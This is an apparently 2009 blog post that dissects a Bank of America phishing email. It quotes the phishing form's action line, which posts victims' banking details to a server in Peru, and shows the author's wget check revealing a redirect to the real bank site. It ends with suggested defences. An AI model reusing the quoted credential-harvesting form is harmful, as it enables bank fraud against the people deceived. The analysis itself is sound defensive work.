Sunday, October 04, 2009
How Many People Will Fall for this Phish Email?
I received this in my inbox tonight. I wonder how many people will fall for this ruse? If you look, it seems to come from support.com. Likely support.com's email server was used as a relay. This is support.com:
Administrative Contact, Technical Contact:
Vatturi, Sujan Sujan.Vatturi@support.com
1900 Seaport Blvd
Redwood CIty, CA 94063
Any real email would come from a Bank of America address, and they would not have you fill out a form to send them via email or post via the Worldwide Web unless you were a business account. (Yes, business to business transactions are a lot more lax. You'd think the security would be tighter, but it's actually almost nonexistent in many instances.) I generally don't comment about these things, but these scams are becoming so common and banks are losing people's money to these scams with greater frequency, yet no one knows the losses. What's worse is that your helpful Windows computer may be the link in the chain that allows some bad guy to rob your bank account some day. I don't use Windows for any banking transactions and I've had one credit card account compromised this year which means that either a merchant I've used, the bank that issued the credit card, or the company handling credit card transactions had its systems compromised. My guess is the latter since I didn't use that card for very many purchases.
But back to the scam at hand, buried in the web form they have you download is this bit:
...="Ps" action="http://220.127.116.11/services/bofa.php" method="post"
18.104.22.168 is in Lima, Peru.
IP Telefonica del Peru
Calle San Felipe 1144, 1144,
LI34 - Lima - LI
So, you are submitting your information to a server in Peru, but when you connect to it, it immediately redirects your browser to Bank of America:
wget -c http://22.214.171.124/services/bofa.php
--2009-10-04 23:57:42-- http://126.96.36.199/services/bofa.php
Connecting to 188.8.131.52:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&context=&override_debug_mode=DEBUG&template=rv_loans&type=&destination=nba/vehicle_and_personal_loans/index.cfm?adlink= [following]
--2009-10-04 23:57:42-- http://www.bankofamerica.com/state.cgi?section=generic&update=&cookiecheck=yes&context=&override_debug_mode=DEBUG&template=rv_loans&type=&destination=nba/vehicle_and_personal_loans/index.cfm?adlink=
Resolving www.bankofamerica.com... 184.108.40.206
Connecting to www.bankofamerica.com|220.127.116.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
The 302 code is an HTML redirect. They don't want their site indexed by search engines because this is the easiest way to find them and shut them down. However, if Bank of America was clever, they would be correlating their customers' IP addresses accessing their web server with redirections from 18.104.22.168 to gain a rough idea who is being fooled. They should also put in a complaint with that Peruvian telecom to shut down that server. But all the customer sees is the following web page while the bad guys abscond with the financial information the customers have given them.
Redirection to Bank of America from Peruvian server
Pretty clever, huh? It's an easy way to make a living for someone in a poor country. And, it costs all of us money in the form of bank fees.
Labels: Crappy IT Security
Also Nigeria is sending a few along with most countries of central Africa. Or could be Western con artits faking the African country origin.
Something that the NSA/FBI could combat and flatten (with anti fake programs) I hope.
The way to stop it is mutlifold:
1. Educate your customers.
2. Monitor customer accounts the way credit card account are monitored, on a transaction basis (Schneier's proposal).
3. Make banks liable for all losses of this kind. (Schneier's and others' proposal).
4. Prevent redirections to your site from people that are not your business partners, vendors, or the government. This could be done at the DNS, router, proxy, or firewall, but not easily. Chances are though that the company knows who it does business with overseas, so it can block all other access from overseas networks that isn't legitimate.
5. Fix international laws allowing the extradition of criminals for international wire fraud and bank theft.
Modern bank robbers now rob the bank either by owning it, or robbing the customers via deception or malware. Either method is effective and the chances of getting caught are slim to none.
Links to this post: